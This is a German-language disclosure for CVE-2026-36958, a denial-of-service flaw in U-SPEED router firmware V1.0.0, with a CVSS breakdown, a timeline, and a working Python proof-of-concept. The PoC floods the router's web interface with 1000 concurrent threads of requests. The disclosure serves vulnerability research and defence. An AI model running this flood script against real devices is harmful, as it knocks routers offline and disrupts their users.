
Proof-of-Concept für CVE-2026-36958, eine Denial-of-Service-Schwachstelle in der U-SPEED-Router-Firmware, die über gleichzeitige HTTP-Anfragen Ressourcen erschöpft und dazu führt, dass die Weboberfläche nicht mehr reagiert.
CVE-ID: CVE-2026-36958 Datum: 2026-04-29 Entdecker: Kirubel Solomne Hersteller: U-SPEED Produkt: U-SPEED Router Firmware-Version: V1.0.0 CWE: CWE-400 - Unkontrollierte Ressourcennutzung
Die Firmware V1.0.0 des U-SPEED Routers ist anfällig für Denial of Service. Durch das Senden einer großen Anzahl gleichzeitiger HTTP-Anfragen an zufällige oder nicht existierende Endpunkte der Webverwaltungsoberfläche kann ein Angreifer die Systemressourcen des eingebetteten Boa-HTTP-Servers erschöpfen. Dies führt dazu, dass die Weboberfläche des Routers nicht mehr reagiert und möglicherweise ein manueller Neustart erforderlich ist, um den normalen Betrieb wiederherzustellen.
CVSS v3.1 Score: 7.5 (Hoch)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Metrik | Wert |
|---|---|
| Angriffsvektor | Netzwerk |
| Angriffskomplexität | Niedrig |
| Erforderliche Privilegien | Keine |
| Benutzerinteraktion | Keine |
| Auswirkung auf Vertraulichkeit | Keine |
| Auswirkung auf Integrität | Keine |
| Auswirkung auf Verfügbarkeit | Hoch |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
Erwartetes Verhalten: Der Server sollte gleichzeitige Verbindungen ordnungsgemäß verarbeiten. Tatsächliches Verhalten: Die Weboberfläche reagiert nicht mehr; ein manueller Neustart ist erforderlich.
| Datum | Ereignis |
|---|---|
| 2026-04-29 | Schwachstelle entdeckt |
| 2026-04-29 | An MITRE gemeldet |
| 2026-04-29 | CVE-2026-36958 zugewiesen |
| 2026-04-29 | Öffentliche Offenlegung |